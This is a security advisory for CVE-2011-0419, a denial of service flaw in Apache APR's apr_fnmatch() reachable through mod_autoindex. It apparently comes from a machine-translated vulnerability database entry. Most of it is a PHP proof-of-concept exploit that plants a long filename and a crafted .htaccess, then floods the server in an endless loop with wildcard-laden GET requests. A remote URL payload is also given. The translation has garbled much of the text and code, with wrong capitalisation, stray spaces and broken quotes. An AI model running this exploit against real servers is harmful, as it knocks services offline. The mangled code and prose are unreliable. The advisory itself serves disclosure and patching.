Release date:
Updated on:
Affected Systems:
NetBSD 4.x
Apache Group Apache Software Foundation 2.x
Apache Group APR 1.4.3
Apache Group APR 1.4.2
Unaffected system:
Apache Group Apache Software Foundation 2.2.18
Apache Group APR 1.4.4
Description:
--------------------------------------------------------------------------------
Bugtraq id: 47820
Cve id: CVE-2011-0419
The purpose of APR (Apache portable Run-time libraries, which can be transplanted to a Runtime Library) is as follows, it mainly provides an underlying support interface library for upper-layer applications that can be used across multiple operating system platforms.
Apache APR "apr_fnmatch ()" has a denial of service vulnerability. Remote attackers can exploit this vulnerability to cause denial of service.
<* Source: Maksymilian Arciemowicz (max@jestsuper.pl)
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<? Php
/*
Apache 2.2.17 mod_autoindex local/remote Denial of Service
Author: Maksymilian Arciemowicz
CVE-2011-0419 (CVE)
CWE: CWE-399
REMOTE
Find some directory with supported mod_autoindex on the server. The directory shocould contain long filenames.
Http: // [server]/[directory_with_mod_autoindex]/? P = *? *? *? [To 4 k]
LOCAL
Tested on:
127 # httpd-v & uname-
Server version: Apache/2.2.17 (Unix)
Server built: Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org: /home/builds/AB/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/AB/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386
Result:
127 # ls-la
Total 8
Drwxrwxrwx 2 root wheel 512 Feb 8.
Drwxr-xr-x 7 www wheel 1024 Jan 31 ..
-Rw-r-1 www wheel 1056 Feb 8. htaccess
-Rw-r-1 www wheel 0 Feb 8 cx ........................................................................... ..................................................
-Rw-r-1 www wheel 1240 Feb 8 run. php
127 # ps-aux-p 617
User pid % CPU % MEM VSZ RSS TTY STAT STARTED TIME COMMAND
Www 617 98.6 0.4 10028 4004? R pm. 17/usr/pkg/sbin/httpd-k start
Time = 12:43 and counting
Where http: // [$ localhost]: [$ localport]/[$ localuri]
*/
$ Localhost = "localhost ";
$ Localport = 80;
$ Localuri = "/koniec /";
If (! Is_writable (".") die ("! Writable ");
// Phase 1
// Create some filename
Touch ("cx". str_repeat (".", 125 ));
// Phase 2
// Create. htaccess
Unlink ("./. htaccess ");
$ Htaccess = fopen ("./. htaccess", "");
Fwrite ($ htaccess, "AddDescription" CVE-2011-0419 ". str_repeat ('*.', 512 )."");
Fclose ($ htaccess );
// Phase 3
// Local connect (bypass firewall restriction)
While (1 ){
$ Fp = fsockopen ($ localhost, $ localport, $ errno, $ errstr, 30 );
If (! $ Fp) echo "$ errstr ($ errno) <br/> ";
Else {
$ Out = "GET". $ localuri ."/? P = ". str_repeat (" *? ", 1500). "* HTTP/1.1 ";
$ Out. = "Host:". $ localhost ."";
$ Out. = "Connection: Close ";
Fwrite ($ fp, $ out );
Fclose ($ fp );
}
}
?>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Apache Group
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://httpd.apache.org/